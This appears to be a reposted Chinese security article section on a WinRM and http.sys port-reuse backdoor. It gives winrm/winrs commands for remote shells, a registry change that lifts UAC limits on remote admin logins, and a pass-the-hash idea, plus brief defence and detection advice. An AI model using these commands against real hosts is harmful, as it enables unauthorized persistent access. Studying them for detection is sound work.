端口复用后门

2.3 后门连接和使用

首先开启本机WinRM服务，然后设置信任连接的主机

winrm quickconfig -q # 开启服务
winrm set winrm/config/Client @{TrustedHosts="*"}  # 设置信任连接的主机

然后执行使用winrs命令连接远程WinRM服务即可执行命令。

winrs -r:http://www.baidu.com -u:administrator -p:[email?protected] whoami

上述会在远程主机执行whoami命令。使用cmd替换whoami即可得到一个交互式shell。

注意：

此时会在目标主机安全日志中产生登录类型为 3 的登录记录,此次登录的登录事件顺序为："凭据验证" -> "特殊登录" -> "登录(4624)" -> "注销(4634)"

登录事件展开:

2.4 UAC问题

WinRM服务也是受UAC影响的，所以本地管理员用户组里面只有administrator可以登录，其他管理员用户是没法远程登录WinRM的。要允许本地管理员组的其他用户登录WinRM，需要修改注册表设置。

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

修改后使用管理员组用户即可登录WinRM。

2.5 Hash登录

系统自带的winrs命令登录时需要使用明文账号密码，那很多场景下尤其是windows 2012以后，经常只能抓取到本地用户的hash，无法轻易获得明文密码。因此需要实现一款支持使用NTLM hash登录的客户端，使用python来实现不难。

2.6 防御：

• 防火墙/IDS/IPS与web服务器配合使用，在其规则中采用白名单机制去判断是否属于web服务器当前允许的ACL URL。

2.7 检测

可以在服务和应用程序中查找是否存在Windows Remote Management (WS-Management)，存在则证明WinRM服务已经开启（此时已经可以通过winrm监听的端口远程连接主机）。

可执行netsh http show servicestate 命令，找到输出结果中注册的url前缀为WSMAN的端口，然后执行winrm e winrm/config/listener命令获取winrm端口（HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWSMANListener），比较结果，如果有重合，则证明存在http.sys端口复用问题。

三. Refer

https://www.codeproject.com/Articles/437733/Demystify-http-sys-with-HttpSysManager

https://paper.seebug.org/1004/

（编辑：晋中站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!